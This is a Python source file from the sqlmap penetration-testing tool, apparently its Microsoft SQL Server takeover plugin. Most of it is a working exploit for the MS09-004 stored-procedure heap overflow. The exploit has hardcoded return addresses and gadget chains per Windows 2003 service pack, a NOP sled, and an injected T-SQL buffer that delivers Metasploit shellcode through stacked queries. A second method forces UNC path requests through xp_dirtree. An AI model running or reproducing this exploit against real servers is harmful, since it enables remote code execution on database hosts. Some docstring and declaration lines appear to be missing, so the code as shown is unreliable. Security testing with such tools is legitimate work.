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148 lines
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148 lines
6.2 KiB
#!/usr/bin/env python
Copyright (c) 2006-2010 sqlmap developers (http://sqlmap.sourceforge.net/)
See the file 'doc/COPYING' for copying permission
import binascii
from lib.core.data import kb
from lib.core.data import logger
from lib.core.exception import sqlmapUnsupportedFeatureException
from lib.request import inject
from plugins.generic.takeover import Takeover as GenericTakeover
class Takeover(GenericTakeover):
def __init__(self):
self.spExploit = ""
def uncPathRequest(self):
#inject.goStacked("EXEC master..xp_fileexist '%s'" % self.uncPath, silent=True)
inject.goStacked("EXEC master..xp_dirtree '%s'" % self.uncPath)
def spHeapOverflow(self):
* http://www.microsoft.com/technet/security/bulletin/MS09-004.mspx
* http://support.microsoft.com/kb/959420
returns = {
# 2003 Service Pack 0
"2003-0": (""),
# 2003 Service Pack 1
"2003-1": ("CHAR(0xab)+CHAR(0x2e)+CHAR(0xe6)+CHAR(0x7c)", "CHAR(0xee)+CHAR(0x60)+CHAR(0xa8)+CHAR(0x7c)", "CHAR(0xb5)+CHAR(0x60)+CHAR(0xa8)+CHAR(0x7c)", "CHAR(0x03)+CHAR(0x1d)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x03)+CHAR(0x1d)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x13)+CHAR(0xe4)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0x1e)+CHAR(0x1d)+CHAR(0x88)+CHAR(0x7c)", "CHAR(0x1e)+CHAR(0x1d)+CHAR(0x88)+CHAR(0x7c)" ),
# 2003 Service Pack 2 updated at 12/2008
#"2003-2": ("CHAR(0xe4)+CHAR(0x37)+CHAR(0xea)+CHAR(0x7c)", "CHAR(0x15)+CHAR(0xc9)+CHAR(0x93)+CHAR(0x7c)", "CHAR(0x96)+CHAR(0xdc)+CHAR(0xa7)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x17)+CHAR(0xf5)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0x1b)+CHAR(0xa0)+CHAR(0x86)+CHAR(0x7c)", "CHAR(0x1b)+CHAR(0xa0)+CHAR(0x86)+CHAR(0x7c)" ),
# 2003 Service Pack 2 updated at 05/2009
"2003-2": ("CHAR(0xc3)+CHAR(0xdb)+CHAR(0x67)+CHAR(0x77)", "CHAR(0x15)+CHAR(0xc9)+CHAR(0x93)+CHAR(0x7c)", "CHAR(0x96)+CHAR(0xdc)+CHAR(0xa7)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x47)+CHAR(0xf5)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0x0f)+CHAR(0x31)+CHAR(0x8e)+CHAR(0x7c)", "CHAR(0x0f)+CHAR(0x31)+CHAR(0x8e)+CHAR(0x7c)")
# 2003 Service Pack 2 updated at 09/2009
#"2003-2": ("CHAR(0xc3)+CHAR(0xc2)+CHAR(0xed)+CHAR(0x7c)", "CHAR(0xf3)+CHAR(0xd9)+CHAR(0xa7)+CHAR(0x7c)", "CHAR(0x99)+CHAR(0xc8)+CHAR(0x93)+CHAR(0x7c)", "CHAR(0x63)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x63)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x17)+CHAR(0xf5)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0xa4)+CHAR(0xde)+CHAR(0x8e)+CHAR(0x7c)", "CHAR(0xa4)+CHAR(0xde)+CHAR(0x8e)+CHAR(0x7c)"),
addrs = None
for versionSp, data in returns.items():
version, sp = versionSp.split("-")
sp = int(sp)
if kb.osVersion == version and kb.osSP == sp:
addrs = data
if addrs is None:
errMsg = "sqlmap can not exploit the stored procedure buffer "
errMsg += "overflow because it does not have a valid return "
errMsg += "code for the underlying operating system (Windows "
errMsg += "%s Service Pack %d)" % (kb.osVersion, kb.osSP)
raise sqlmapUnsupportedFeatureException(errMsg)
shellcodeChar = ""
hexStr = binascii.hexlify(self.shellcodeString[:-1])
for hexPair in range(0, len(hexStr), 2):
shellcodeChar += "CHAR(0x%s)+" % hexStr[hexPair:hexPair+2]
shellcodeChar = shellcodeChar[:-1]
self.spExploit = """
@val NVARCHAR(4),
@counter INT
SET @buf = '
DECLARE @retcode int, @end_offset int, @vb_buffer varbinary, @vb_bufferlen int
EXEC master.dbo.sp_replwritetovarbin 347, @end_offset output, @vb_buffer output, @vb_bufferlen output,'''
SET @val = CHAR(0x41)
SET @counter = 0
WHILE @counter < 3320
SET @counter = @counter + 1
IF @counter = 411
/* pointer to call [ecx+8] */
SET @buf = @buf + %s
/* push ebp, pop esp, ret 4 */
SET @buf = @buf + %s
/* push ecx, pop esp, pop ebp, retn 8 */
SET @buf = @buf + %s
/* Garbage */
SET @buf = @buf + CHAR(0x51)+CHAR(0x51)+CHAR(0x51)+CHAR(0x51)
/* retn 1c */
SET @buf = @buf + %s
/* retn 1c */
SET @buf = @buf + %s
/* anti DEP */
SET @buf = @buf + %s
/* jmp esp */
SET @buf = @buf + %s
/* jmp esp */
SET @buf = @buf + %s
SET @buf = @buf + CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+CHAR(0x90)
SET @buf = @buf + CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+CHAR(0x90)
SET @buf = @buf + CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+CHAR(0x90)
SET @buf = @buf + CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+CHAR(0x90)
SET @buf = @buf + CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+CHAR(0x90)
SET @buf = @buf + CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+CHAR(0x90)
set @buf = @buf + CHAR(0x64)+CHAR(0x8B)+CHAR(0x25)+CHAR(0x00)+CHAR(0x00)+CHAR(0x00)+CHAR(0x00)
set @buf = @buf + CHAR(0x8B)+CHAR(0xEC)
set @buf = @buf + CHAR(0x83)+CHAR(0xEC)+CHAR(0x20)
/* Metasploit shellcode */
SET @buf = @buf + %s
SET @buf = @buf + CHAR(0x6a)+CHAR(0x00)+char(0xc3)
SET @counter = @counter + 302
SET @val = CHAR(0x43)
SET @buf = @buf + @val
SET @buf = @buf + ''',''33'',''34'',''35'',''36'',''37'',''38'',''39'',''40'',''41'''
EXEC master..sp_executesql @buf
""" % (addrs[0], addrs[1], addrs[2], addrs[3], addrs[4], addrs[5], addrs[6], addrs[7], shellcodeChar)
self.spExploit = self.spExploit.replace(" ", "").replace("\n", " ")
logger.info("triggering the buffer overflow vulnerability, please wait..")
inject.goStacked(self.spExploit, silent=True)